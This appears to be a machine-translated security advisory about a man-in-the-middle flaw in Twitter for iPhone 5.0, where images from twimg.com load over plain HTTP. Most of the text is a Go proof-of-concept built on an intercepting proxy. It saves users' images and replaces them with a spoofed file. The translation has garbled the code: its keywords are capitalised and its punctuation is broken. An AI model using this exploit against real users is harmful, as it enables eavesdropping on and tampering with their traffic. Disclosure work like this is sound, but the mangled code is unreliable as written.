Release date:
Updated on:
Affected Systems:
Twitter 5.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56665
Twitter is a foreign social network and microblog service website. It uses wireless networks, wired networks, and communication technologies for instant messaging. It is a typical application of microblogs.
The man-in-the-middle attack vulnerability exists in Twitter for iPhone 5.0 and other versions. The Twitter application communicates with the Twitter API through the HTTPS link, but the image received from * .twimg.com is not encrypted, but only communicates through HTTP. Attackers can exploit this vulnerability to capture and modify images in the application.
<* Source: Carlos Reventlov
Link: view-source: http://www.mondounix.com/twitter-app-5-0-vulnerable-eavesdropping/
Http://reventlov.com/advisories/twitter-app-vulnerable-to-partial-mitm
Http://www.securityfocus.com/archive/1/524812/30/0/threaded
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
/*
Twitter App, eavesdroping PoC
Written by Carlos Reventlov <carlos@reventlov.com>
License MIT
*/
Package main
Import (
"Fmt"
"Github.com/xiam/hyperfox/proxy"
"Github.com/xiam/hyperfox/tools/logger"
"Io"
"Log"
"OS"
"Path"
"Strconv"
"Strings"
)
Const imageFile = "spoof.jpg"
Func init (){
_, Err: = OS. Stat (imageFile)
If err! = Nil {
Panic (err. Error ())
}
}
Func replaceAvatar (pr * proxy. ProxyRequest) error {
Stat, _: = OS. Stat (imageFile)
Image, _: = OS. Open (imageFile)
Host: = pr. Response. Request. Host
If strings. HasSuffix (host, "twimg.com") = true {
If pr. Response. ContentLength! = 0 {
File: = "saved" + proxy. PS + pr. FileName
Var ext string
ContentType: = pr. Response. Header. Get ("Content-Type ")
Switch contentType {
Case "image/jpeg ":
Ext = ". jpg"
Case "image/gif ":
Ext = ". gif"
Case "image/png ":
Ext = ". png"
Case "image/tiff ":
Ext = ". tiff"
}
If ext! = ""{
Fmt. Printf ("** Saving image. \ n ")
OS. MkdirAll (path. Dir (file), OS. ModeDir | OS. FileMode (0755 ))
Fp, _: = OS. Create (file)
If fp = nil {
Fmt. Errorf (fmt. Sprintf ("cocould not open file % s for writing.", file ))
}
Io. Copy (fp, pr. Response. Body)
Fp. Close ()
Pr. Response. Body. Close ()
}
}
Fmt. Printf ("** Sending bogus image. \ n ")
Pr. Response. ContentLength = stat. Size ()
Pr. Response. Header. Set ("Content-Type", "image/jpeg ")
Pr. Response. Header. Set ("Content-Length ",
Strconv. Itoa (int (pr. Response. ContentLength )))
Pr. Response. Body = image
}
Return nil
}
Func main (){
P: = proxy. New ()
P. AddDirector (logger. Client (OS. Stdout ))
P. AddInterceptor (replaceAvatar)
P. AddLogger (logger. Server (OS. Stdout ))
Var err error
Err = p. Start ()
If err! = Nil {
Log. Printf (fmt. Sprintf ("Failed to bind: % s. \ n", err. Error ()))
}
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Twitter
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://itunes.apple.com/cn/app/twitter/id333903271? Mt = 8